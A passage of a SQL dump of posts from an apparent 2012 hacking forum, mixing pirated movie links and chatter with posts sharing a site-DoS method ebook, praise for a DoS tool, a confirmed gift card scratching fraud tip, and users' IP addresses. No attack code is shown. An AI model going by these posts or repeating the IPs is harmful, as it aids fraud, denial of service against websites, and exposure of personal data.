`replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7062', '1199', '0', '64', 'Silent Hill: Revelation 3D (2012) Movie RIP', '0', '9', 'p420', '1352185232', 'Watch Silent Hill for free online on L33T Hacking. [b]Genre:[/b] Horror , Thriller , Mystery [b]Release:[/b] 31 October 2012 [b]Length:[/b] 94 min [b]Rate:[/b] 70% [b]Description:[/b] When her father disappears, Heather Mason is drawn into a strange and terrifying alternate reality that holds answers to the horrific nightmares that have plagued her since childhood. [b]Links[/b] Fleon: http://fleon.me/rc.php?Id=8fac812c06c3c66817bfe40684dacd9d HQVideo: http://hqvideo.cc/pc/22dea21819f8c47c/ Worldvideo: http://worldvid.co/video/6318641c650c7695c8fb7be1811fae2a/ Vidgang: http://vidgang.co/video/fcc174ca874a6a895d8c0b68b44be670/', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1a75889c47b79a9cb398bb0af5c3cf23', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7063', '1200', '0', '65', '[Review] Skyfall 2012', '0', '9', 'p420', '1352185360', 'I watched Skyfall and it\'s a great movie. It\'s not released yet in US but I have posted a movie rip in the rips section. It\'s a great movie and one of the best 007 movies I believe, it was fun watching it and would recommend it to everyone. Post your reviews below.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e173a38dc6e73799df8ee41d219bb929', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7064', '1201', '0', '64', 'Sinister Movie Rip', '0', '9', 'p420', '1352186162', '[img]http://content8.flixster.com/movie/11/16/69/11166934_det.jpg[/img] [b]Genre:[/b] Horror , Mystery [b]Release:[/b] 12 October 2012 [b]Length:[/b] 110 min [b]Rate:[/b] 71% [b]Description[/b]: Found footage helps a true-crime author realize how and why a family was murdered in his new home, though his discoveries put his entire family in the path of a supernatural entity. [b]Links[/b] Skylo: http://skylo.me/rc.php?Id=aa0df4a35184f6ae24fbb050d7df7e4d Fleon: http://fleon.me/rc.php?Id=5fd9f878fff648328f96fef12e90f0b9 HQvideo: http://hqvideo.cc/pc/21bdfd851cd1b11c/', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '39f991ba3a7dc327c3756063ee40cb6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7065', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '9', 'p420', '1352186259', 'I watched it a year ago. Forgot some stuff but it\'s a nice video.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '936dc48f5eda5228a062fd921d11e8f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7066', '1183', '6956', '46', 'RE: [TUT] Getting Images from index', '0', '9', 'p420', '1352186345', 'Can we just find the path of the image and append the path on the url of the site?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bfb5d6118487b2bb5ea6bcfe9c421bf2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7067', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '67', 'HoverCatz', '1352188865', 'Do i need to restart my pc? It came up straight away', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', 'b3374e912bf9478b2aa23d0dfd31677d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7068', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '67', 'HoverCatz', '1352189085', 'I can make required plugins, for the Dev rank.', '193.161.89.204', '-1046390324', '1', '0', '67', '1352189203', '1', '8e4e5afcf107daa0826ebb347c2e2f80', '0', '1352189203'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7069', '1190', '7004', '3', 'RE: New Rule', '0', '222', 'Exposé', '1352189855', 'Yeh this is a very good rule. That way it decreases people stealing shit from LH....', '74.67.7.114', '1245906802', '1', '0', '0', '0', '1', '424e7e1de09c7451ac3a731b46722185', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7070', '1196', '7048', '7', 'RE: Your favorite time of the year?', '0', '62', 'R?????zo?', '1352191916', 'Well my favourite time in the year is December (Yeah I know it\'s a month) but that\'s me and my gf\'s birthday with X-mas and New Year, it\'s just a full month partying :)', '188.140.116.210', '-1131645742', '1', '0', '0', '0', '1', '3b99c13de1c77429ca10dad40b36fb75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7071', '1202', '0', '34', '???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '62', 'R?????zo?', '1352193031', '[font=Impact][align=center][size=xx-large]PHOTOSHOP KEYBOARD SHORTCUTS FOR SELECTIONS[/size][/align][/font] [size=medium][align=center]Ctrl+A selects everything on the screen. Ctrl+D deselects everything on the screen. Ctrl+Click on a Layers icon to select the contents of a layer Ctrl+Shift+I Inverts a selection Ctrl + Alt/Option + A Selects all layers Ctrl + Alt/Option + R Brings up Refine Edge menu[/align][/size] [font=Impact][size=xx-large][align=center][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR LAYERS[/align][/align][/size][/font] [size=medium][align=center]Ctrl + Shift + N creates a new layer Ctrl + J makes a duplicate of the current layer or selection. Ctrl + Shift + J Makes a new layer via cut Ctrl + E Merges the current layer with the one below Ctrl + Shift + E merges all visible layers Ctrl + Shift + Alt/Option + E merges all visible layers into a new composite Layer Ctrl + ] Brings layer up/forward one layer Ctrl + [ Sends layer down/back one layer Ctrl + Shift + ] Brings layer to the top/front Ctrl + Shift + [ Sends layer to the bottom/back Ctrl + G groups layers together Ctrl + Shift + G Ungroups layers. Alt/Option-click on the eye icon of a layer to hide all other layers than this one. Alt/Option -click between 2 layers to create a clipping mask between the 2 layers. [/align][/size] [font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR TOOLS[/align][/size][/font] [size=medium][align=center]V - The Move Tool M?-?The Marquee Tool W?-?The Magic Wand/Quick Selection Tool L - The Lasso Tool B?-?The Brush Tool I?-?The Eyedropper Tool J - The Spot Healing Brush C?-?The Crop Tool G - The Gradient Tool Y - The History Brush S - The Clone Stamp Tool Z - The Zoom Tool A - The Path Selection Tool E?-?The Eraser Tool U - The Custom Shape Tool P?-?The Pen Tool O - The Dodge Tool T?-?The Type Tool H - The Hand Tool R - The Rotate ToolHold shift + hit any key multiple times- Cycles through the sub tools under the main tool. Example: Shift + G switches from the gradient tool to the Paint Bucket tool. Hit it again, and it will switch to the 3D Material Drop Tool.[/align][/size] [font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR BRUSHES[/align][/size][/font] [size=medium][align=center][ - makes a brush become larger. ] – makes a brush become smaller. 1-9 – lowers the opacity of the brush to a percentage. Example: 1=10%. Ctrl + Alt/Option + Dragging up or down adjusts the hardness of your brush. Ctrl + Alt/Option + Dragging left or right adjusts the size of your brush[/align][/size] [font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR TYPE[/align][/size][/font] [size=medium][align=center]Double-click the T icon in a text layer to select all of the text on a layer. With text selected, select the font name in the options bar and Use + and – to cycle through each font, enabling you to preview your type in each font choice. Ctrl + Alt/Option + Shift + < – Decreases selected text by 10pt Ctrl + Alt/Option + Shift + > – Increases selected text by 10pt Ctr + Shift + C centers selected type Ctr + Shift + B Makes selected type bold Ctr + Shift + I Makes selected type italic Ctr + Shift + L Aligns selected text to the left Ctr + Shift + R Aligns selected text to the right Ctr + Shift + U Underlines Selected text Ctr + Shift + H Makes selected text small caps Ctr + Shift + K Makes selected text all caps[/align][/size] [font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR ADJUSTMENTS[/align][/size][/font] [size=medium][align=center]Ctrl+L Brings up the Levels Adjustment Ctrl+M Brings up the Curves Adjustment Ctrl+U Brings up the Hue/Saturation Adjustment Ctrl+B Brings up the Color Balance Adjustment Ctrl+Shift + Alt/Option + B Brings up the Black & White Adjustment Ctrl+Shift + U Desaturates your image [/align][/size] [font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR VIEWING[/align][/size][/font] [size=medium][align=center]Ctrl+ - makes you zoom out of a photo. Ctrl+ + makes you zoom in on a photo. Ctrl+ 0 makes your document fit on the screen. Ctrl+R shows and hides your rulers. Ctrl+I inverts the current image, layer, or selection. Ctrl + Alt/Option + I brings up the dialog box for image size and resolution. Ctrl + Alt/Option + C brings up the dialog box for canvas size. [/align][/size] [font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR FILLS[/align][/size][/font] [size=medium][align=center]Alt/Option + delete fills a layer with the current foreground color. Ctrl + delete fills a layer with the current background color. Shift + delete Brings up a fill dialog box with different options. 1-9 determines the percentage of opacity for a layer. Example: 1 = 10%. Alt + 1-9 determines the percentage of fill for a layer. Example: 1 = 10%.[/align][/size] [font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR SAVING[/align][/size][/font] [size=medium][align=center]Ctrl + S Saves the current document. Ctrl + Shift + S Saves as a new document of your choice. Ctrl + Alt/Option + Shift + S brings up the Save for Web dialog box.[/align][/size] [font=Impact][size=xx-large][align=center]OTHER PHOTOSHOP KEYBOARD SHORTCUTS[/align][/size][/font] [size=medium][align=center]Ctrl + F repeats the last filter that you used. Hitting the D key resets your Foreground and Background color to black & White. Hitting the X Key will switch your Foreground and Background colors. Alt/Option-Click on a layer mask icon allows you to view the black & white mask. Hold shift and tap the “+” key repeatedly to cycle down the different blend modes Hold shift and tap the “-” key repeatedly to cycle up the different blend modes Hit the Space Bar to switch to the Hand Tool to move around your document. Release the Space Bar to switch back to the tool you were using before. Ctrl + T Transforms the currently selected layer(s).[/align][/size] credits: Rin™', '188.140.116.210', '-1131645742', '1', '0', '62', '1352193063', '1', 'fa5c8bf6c2fa63e608380a0832ab944e', '0', '1352193063'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7072', '1164', '6985', '11', 'RE: RAT Help', '0', '5', 'Timmy', '1352193793', '[quote=\'MinecraftGeek\' pid=\'6985\' dateline=\'1351971030\'] Trying to RAT Deetz are you Jacob? [/quote] Who the heck is Deetz?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0be4aabab5433c9a8b324247ba8bad46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7073', '1203', '0', '21', 'Jok3r Manual DoSing sites method', '0', '5', 'Timmy', '1352195123', 'This method can be used to hit small and medium sites even if they are using Cloudflare it shouldn\'t be a problem. Please Please Please leech this ebook and Yes I AM asking because the most this ebook goes around the better it would be for L33T Hacking. [lock]Download: http://www.mediafire.com/view/?pf897pk545v7rvp[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '354295496d5260ddbc4b990c4598bc7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7074', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '5', 'Timmy', '1352195245', 'http://l33thacking.net/thread-1203-lastpost.html Enjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '991d626f33ded43c99c512ced1713baf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7075', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '7', 'Romdu62', '1352195357', '0/10 because he doesnt like catz', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '29daf93cda13f9affc741972b59cd526', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7076', '253', '1106', '56', 'RE: Count to 200', '0', '7', 'Romdu62', '1352195403', '57. Today, 02:45 AM A time for something :P', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c877fc25bfa52756e04d38b9b214a7be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7077', '487', '2354', '56', 'RE: Corrupt a wish', '0', '7', 'Romdu62', '1352195442', 'no idea what breshie is talking about. i wish i was a scientisit', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'fefeda9e9bd352f68ef40f557a5e8561', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7078', '238', '1021', '56', 'RE: Ban the user above you', '0', '7', 'Romdu62', '1352195474', 'Banned for aving adsense traffic.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c2575ace55a75de7fedc6b905dd68cb1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7079', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '7', 'Romdu62', '1352195504', 'I hoope i win. Good luck myself', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '58e7081dd56a4d7f8987612ef002a4b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7080', '197', '696', '56', 'RE: /me Thread', '0', '7', 'Romdu62', '1352195536', '/me is jealous ipod is talking to t3h jok3r', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f4dde5835f21ccbffd3a149834cb7758', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7081', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '7', 'Romdu62', '1352195571', 'Dont know u but welcome back', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2831946fcb364e4943832b2efca7f7b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7082', '1177', '7025', '43', 'RE: Free itunes/app store gift cards crack', '0', '7', 'Romdu62', '1352195697', '[quote=\'iTzIpod\' pid=\'7025\' dateline=\'1352039038\'] Didn\'t know about this but oh well. Can t3h jok3r confirm of this? [/quote] This works. i checked it.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '89dd1612414085840ecab0f1bbeac506', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7083', '1120', '6778', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '7', 'Romdu62', '1352195743', '[quote=\'iTzIpod\' pid=\'6778\' dateline=\'1351715254\'] Yeah and the OP said that it\'s premium though too. It\'s not. It just allows you to call people in a group chat and share screen in a group chat with 2 or more people. Skype Premium allows you to call people and text people via SMS. But this doesn\'t allow it. [/quote] it allows calls in my country i dont know about urs.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '89d94319e55716e140b7ee3128173658', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7084', '1204', '0', '3', 'We are L33T', '0', '1', 't3h jok3r', '1352195855', 'Our first section to reach 1337 posts :D Isn\'t this such a great milestone achieved? [attachment=7]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f278b6d354bbfb2a83a3a5c1e0f61ba8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7085', '1173', '6846', '5', 'RE: Request for LH staff', '0', '1', 't3h jok3r', '1352195911', 'Thanks it\'s going to help our Alexa rank :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8d4e0d023ed3207b82572dffcb7429ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7086', '1177', '7025', '43', 'RE: Free itunes/app store gift cards crack', '0', '1', 't3h jok3r', '1352196031', '[quote=\'iTzIpod\' pid=\'7025\' dateline=\'1352039038\'] Didn\'t know about this but oh well. Can t3h jok3r confirm of this? [/quote] Confirmed it works but you have to be able to act in front of the cashier if you are acting weird or something the cashier might suspect something and be careful while scratching. If the cashier finds out that the card is scratched then it\'s either they will send you to get another one or they will question you.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ab325e78464be4bd244a2c94b2311865', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7087', '1205', '0', '43', 'Barcodes Truth', '0', '8', 'spacefish36', '1352196194', 'I found out yesterday that the barcodes on the products are the same, I mean the barcodes of the same product are the same. EX: If you buy two trojan condoms, same flavor etc the barcodes would be the same. I believe all the same flavor trojan condoms barcodes in the store are the same.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '06df2fee42d84e0056b73cd050303f1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7088', '1206', '0', '35', 'Sexy Girls Cool Wallpapers 1920 X 1200', '0', '62', 'R?????zo?', '1352199201', 'Not sure if this is the right section, just wanted to share with you guys some wallpapers that my friend recently sent me. Preview: [img]http://s19.postimage.org/f32dbpelv/40_Sexy_Girls_Cool_Wallpapers_1920_X_1200_Set_3.jpg[/img] [lock] Part 1 - https://www.rapidshare.com/files/4149331322/40_Sexy_Girls_Cool_Wallpapers_1920_X_1200__Set_3_.rar Part 2 - http://www.mediafire.com/?dqh1071ns5sskyx [/lock] Enjoy :)', '188.140.116.210', '-1131645742', '1', '0', '62', '1352199260', '1', '803175a8a888c3151ae94118cda643a0', '0', '1352199260'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7089', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '53', 'sirchamp', '1352200927', 'Finally you have posted it :D Been awaiting this for ages.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '96ef3527716f90bdecb3290ccdcc449d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7090', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '53', 'sirchamp', '1352201000', 'Already had this. Its a very good Doser', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0dc83fe143d46a6f547cdf5c2139e2d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7091', '1204', '7084', '3', 'RE: We are L33T', '0', '205', 'mothered', '1352203699', 'Yes, that\'s quite an achievement. I feel like not posting there, so as not to ruin It. Joking :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4bb4dcadb3099bf537f578dcaa364e53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7092', '1194', '7042', '4', 'RE: moruzaks in the building', '0', '82', 'iTzIpod', '1352206697', 'Welcome to LH bro! Enjoy your stay and be active!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aebdf4f7719bca359eac07d1912197f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7093', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '82', 'iTzIpod', '1352206750', 'You\'re a new member and you\'re doing a giveaway already? Even without making a Introduction thread? Badass alert. I would like one ;p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '991dc089d78e08dd25e373b9784e5185', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7094', '1197', '7050', '4', 'RE: Perfection', '0', '82', 'iTzIpod', '1352206782', 'Welcome to L33tHacking. Enjoy your stay! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0113ccd247adca5ff0302e661bd9ed18', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7095', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '82', 'iTzIpod', '1352206978', 'I saw Skyfall! :o Very nice movie <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '94aa444152f482dfdea6fe260a71d3b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7096', '1196', '7048', '7', 'RE: Your favorite time of the year?', '0', '82', 'iTzIpod', '1352207035', 'New Years, or, Summer Vacation. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '69e85c738f15fae0a19ab76fbbfa2d08', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7097', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1352207095', '0/0 because you have no avatar. ._. And also, you shouldn\'t be judging on a member who doesn\'t like cats or not.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8b9460c32d4b1ac2b4a456082a78a1eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7098', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1352207136', '58. /me is le shit.', '24.212.197.164', '416597412', '1', '0', '82', '1352207144', '1', '3136be79a431189fe5d0154ca98d841f', '0', '1352207144'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7099', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1352207209', 'Granted but you died from an explosion during an experiment test. I wish I had 500+ rep', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7b81feaf26f9aeae10b365a84a8b1497', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7100', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352207240', 'Banned for not having an avatar', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '983eb88f30a006436957edd0302b2d48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7101', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352207272', 'Dude. I won. Chill guys.. ._.', '24.212.197.164', '416597412', '1', 